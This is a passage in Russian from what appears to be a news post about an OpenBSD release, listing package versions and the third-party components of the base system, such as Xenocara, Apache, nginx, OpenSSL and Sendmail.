[/li][li]LibreOffice 3.6.5.2 [/li][li]Emacs 21.4 и 24.2
[/li][li]Vim 7.3.154 [/li][li]PHP 5.2.17 и 5.3.21
[/li][li]Python 2.5.4, 2.7.3 и 3.2.3 [/li][li]Ruby 1.8.7.370 и 1.9.3.392
[/li][li]Tcl/Tk 8.5.13 и 8.6.0 [/li][li]Jdk 1.6.0.32 и 1.7.0.11
[/li][li]Mono 2.10.9 [/li][li]Chromium 24.0.1312.68
[/li][li]Groff 1.21 [/li][li]Go 1.0.3
[/li][li]GCC 4.6.3 и 4.7.2 [/li][li]LLVM/Clang 3.2
[/li]
[/ul]
Компоненты от сторонних разработчиков, входящие в состав OpenBSD 5.2:
[ul]
[li] Xenocara (основанная на X.Org 7.7 с xserver 1.12.3, freetype 2.4.11, fontconfig 2.8.0, Mesa 7.11.2, xterm 287, xkeyboard-config 2.7).
[/li][li] GСС 4.2.1 с патчами, 3.3.6 с патчами и 2.95.3 с патчами;
[/li][li] Perl 5.12.2 (с патчами)
[/li][li] Улучшенная и более защищённая версия Apache 1.3, с поддержкой SSL/TLS и DSO
[/li][li] nginx 1.2.6(с патчами)
[/li][li] OpenSSL 1.0.1c (с патчами)
[/li][li] Sendmail 8.14.6, с libmilter
[/li][li] Bind 9.4.2-P2 (с патчами)
[/li][li] Lynx 2.8.7rel.2 с поддержкой HTTPS и IPv6
[/li][li] Sudo 1.7.2p8
[/li][li] Ncurses 5.7
[/li][li] SQLite 3.7.14.1
[/li][li] Heimdal 0.7.2 (с патчами)
[/li][li] Binutils 2.15 (с патчами)
[/li][li] Gdb 6.3 (с патчами)
[/li][li] Less 444 (с патчами)
[/li][li] Awk, версия от 10 августа 2011 г.
[/li][/ul]
[/li][/ul]

Послушать песню, приуроченную к выходу нового релиза, можно здесь.

Источник